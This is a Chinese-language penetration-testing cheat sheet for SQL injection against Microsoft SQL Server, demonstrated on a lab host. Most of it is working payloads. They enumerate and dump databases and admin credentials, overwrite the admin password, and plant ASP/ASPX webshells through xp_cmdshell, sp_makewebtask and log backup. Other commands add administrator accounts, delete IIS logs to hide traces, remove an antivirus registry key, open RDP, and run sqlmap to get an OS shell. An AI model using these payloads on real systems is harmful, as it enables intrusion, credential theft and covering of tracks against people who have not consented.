接上面一篇
Microsoft推出的一种关系型数据库系统
其主要搭配如下:
1.判断是否有注入
'
"
and 1=1
and 1=2
/
-0
2.初步判断是否是SQLserver数据库(mssql)
and user>0
3.判断数据库系统
and (select count(*) from sysobjects)>0 //mssql
and (select count(*) from msysobjects)>0 //access
Access中不存在sysobjects表,但存在msysobjects表;MSSQL则相反
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数表名
and (select Count(*) from [表名])>0
7.猜字段
and (select Count(字段名) from 表名)>0
8.猜字段中记录长度
and (select top 1 len(字段名) from 表名)>0
9.(1)猜字段的ascii值(access)
and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
(2)猜字段的ascii值(mssql)
and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
http://192.168.10.159:8005/?id=1
数据库版本
id=1 and 1=(select @@version)
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
当前使用的数据库
id=1 and 1=(select db_name())
test
列数据库名称
//获取第1/2/3/4个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4)
and 1=(select top 1 name from master..sysdatabases where dbid>3)
and 1=(select top 1 name from master..sysdatabases where dbid>2)
and 1=(select top 1 name from master..sysdatabases where dbid>1)
and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'wewe')
//xml报错获取全部用户数据库名
and 1=(select name from master..sysdatabases for xml path)
master
tempdb
model
msdb
test
列表名
//获取第一张表 newss
and 1=(select top 1 name from sysobjects where xtype='u')
//获取第二张表 admin
and 1=(select top 1 name from sysobjects where xtype='U' and name <> 'newss' )
//获取全部表
and 1=(select name from sysobjects where xtype='u' for xml path)
newss
admin
获取表admin的列名
//获取第一列列名 admin
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'admin'))
//获取第二列列名 pass
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'admin') and name <> 'admin' )
//获取所有列名
and 1=(select name from syscolumns where id =(select id from sysobjects where name = 'admin') for xml path )
获取列admin与列pass的数据
//获取第一个用户名
and 1=(select top 1 admin from admin)
//获取第一个用户名对应的密码
and 1=(select top 1 pass from admin)
//获取所有信息
and 1=(select admin,pass from admin for xml path)
cracer
admincracer
字段长度
order by 3
查版本和数据库名
//注意数据类型
union select null,(select name from master..sysdatabases for xml path),null
union select @@version,db_name(),null
| test | contest | id |
|---|---|---|
mssql | tetesstesdfaf | 1 |
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) | test | 2 |
查其他数据库的表名还可以这样:
union select (select name from sysobjects where xtype='u' for xml path),null,null
列表名
union select (select name from sysobjects where xtype='u' for xml path),null,null
列列名
union select (select name from syscolumns where id =(select id from sysobjects where name = 'admin') for xml path ),null,null
列数据
union select (select admin,pass from admin for xml path),null,null
and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限
and 1=(select is_srvrolemember('public')) //判断是否为public权限
and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select HAS_DBACCESS('master')) //判断是否有库读取权限
| 过程 | 说明 |
|---|---|
sp_addlogin | 创建新的SQL server登录,该登录允许用户使用SQL server身份验证连接到SQL server实例 |
sp_dropuser | 从当前数据库中删除数据库用户 |
xp_enumgroups | 提供Microsoft Windows本地组列表或在指定的Windows域中定义的全局组列表 |
xp_regwrite | 未被公布的存储过程,写入注册表 |
xp_regread | 读取注册表 |
xp_regdeletevalue | 删除注册表 |
xp_dirtree | 读取目录 |
sp_password | 更改密码 |
xp_servicecontrol | 停止或激活某服务 |
;update admin set pass='49ba59abbe56e057' where admin='cracer'
将管理员表admin中cracer用户的密码设置为49ba59abbe56e057(123456)
记得修改表中数据,防止原管理员登陆出错
修改之前把原来密码备份
通常在密码解不出的情况下选择使用该方法
修复上传
;EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
;exec sp_configure 'Web Assistant Procedures', 1; RECONFIGURE;exec sp_makewebtask 'C:\Inetpub\wwwroot\8005\666.asp','select''<%execute(request("cmd"))%>'''--
1.检测与恢复扩展存储
判断xp_cmdshell扩展存储是否存在
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell')
判断xp_regread扩展存储过程是否存在
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
恢复
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
;exec sp_dropextendedproc xp_cmdshell,'xplog70.dll'
新建用户
;exec master..xp_cmdshell 'net user test test /add'
;exec master..xp_cmdshell 'net localgroup administrators test /add'
操控日志
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log '
Getshell
echo ^<%Execute(request("a"))%^> > d:\www\123.asp
;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx' ;--
操作注册表
删除注册表
reg delete HKLM\SOFTWARE\McAfee /f
导入注册表
Regedit /s d:\web\zh\hp.reg
导出注册表
regedit /e d:\web\zhao\aaa.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp"
添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活某个服务。 (需要SA权限)
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
启用存储过程
exec sp_addextendedproc xp_regread,'xpstar.dll'
;exec master.dbo.sp_addextendedproc 0x780070005f007200650067007200650061006400,0x7800700073007400610072002e0064006c006c00--
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
;exec master..xp_cmdshell 'sc config termservice start=auto'
;exec master..xp_cmdshell 'net start termservice'
;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f'
//允许外部连接
;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x50 /f' //改端口到80
开启3389
;exec master..xp_cmdshell "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"--
1.判断数据库用户权限
and 1=(select is_member('db_owner'));--
2.搜索web目录
;create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID int NOT NULL IDENTITY(1,1));--
然后
;insert into temp(dir,depth,files)exec master.dbo.xp_dirtree 'c:',1,1--
and(select dir from temp where id=1)>0
由于不能一次性获取所有目录文件和文件夹名,因此需要更改ID的值,依次列出文件和文件夹
找到web目录后,就可以写入一句话木马了
;alter database ssdown5 set RECOVERY FULL
;create table test(str image)--
;backup log ssdown5 to disk='c:\test' with init--
;insert into test(str)values ('<%excute(request("cmd"))%>')--
;backup log ssdown5 to disk='c:\inetpub\wwwroot\x.asp'--
;alter database ssdown5 set RECOVERY simple
测试站点:
http://192.168.10.159:8005/?id=1
测试是否存在注入
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch
查询当前数据库名/用户名/是否为dba权限
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch --current-db
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch --current-user
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch --is-dba
查test数据库中表,admin表中字段,查admin,pass字段中数据
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch -D test --tables
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch -D test -T admin --columns
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch -D test -T admin -C admin,pass --dump
os-shell模式
sqlmap -u "http://192.168.10.159:8005/?id=1" --os-shell